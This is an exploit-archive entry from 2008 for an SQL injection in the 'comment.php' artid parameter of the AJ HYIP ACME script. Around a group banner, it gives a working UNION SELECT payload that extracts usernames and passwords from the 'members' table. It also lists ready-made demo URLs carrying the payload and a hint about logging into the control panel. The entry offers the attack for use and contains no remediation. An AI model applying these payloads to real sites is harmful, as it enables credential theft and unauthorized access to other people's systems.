id: 3588
date: 09/01/2008
title: AJ HYIP ACME (comment.php artid) SQL Injection Vulnerability
author: 0day Today Team
cves: 

============================================================
AJ HYIP ACME (comment.php artid) SQL Injection Vulnerability
============================================================



#################################################################################################
####################################  proud to be muslim   ######################################
###                                                                                           ###
###                            rEm0te sql injction VulnErability                              ###
###                                                                                           ###
###                                (ajhyip manager script)                                    ###
###                                                                                           ###
#################################################################################################
#################################################################################################
###                                                                                           ###
### Home   : WwW.alsonaa.com                                                                  ###
###                                                                                           ###    
### members: HeB4RieH , germaya_x                                                             ###
###                                                                                           ###
#################################################################################################
#################################################################################################
###                                                                                           ###
### Script Name : ajhyip                                                                      ###
###                                                                                           ###
### download    : http://www.ajhyip.com/                                                      ###
#################################################################################################
#################################################################################################
###                                                                                           ###
### d0rk ::  "use your mind"                                                                  ###
### (you can log to control panel from http://site.com login.php)                             ###
###                                                                                           ###
### -(:: sql Code ::)-                                                                        ###
###        comment.php?artid=(sql)                                                            ###
###(sql)=5+union+select+1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9+from+members/*    ###               
###                                                                                           ###
#################################################################################################
###                                                                                           ###
### -(::  l!ve demo ::)-                                                                      ###
###                                                                                           ###
###http://www.ajhyip.com/demo/prime/article/comment.php?artid=5+union+select+1,2,3,4,concat_ws(0x3a3a,username,password),6,7,8,9+from+members/*
###                                                                                           ###
###http://www.ajhyip.com/demo/acme/article/comment.php?artid=5+union+select+1,2,3,4,concat_ws(0x3a3a,username,password),6,7,8,9+from+members/*              
########################                                                    #####################
########################                                                    #####################
#################################################################################################
#################################################################################################



#  0day.today [2023-03-22]  #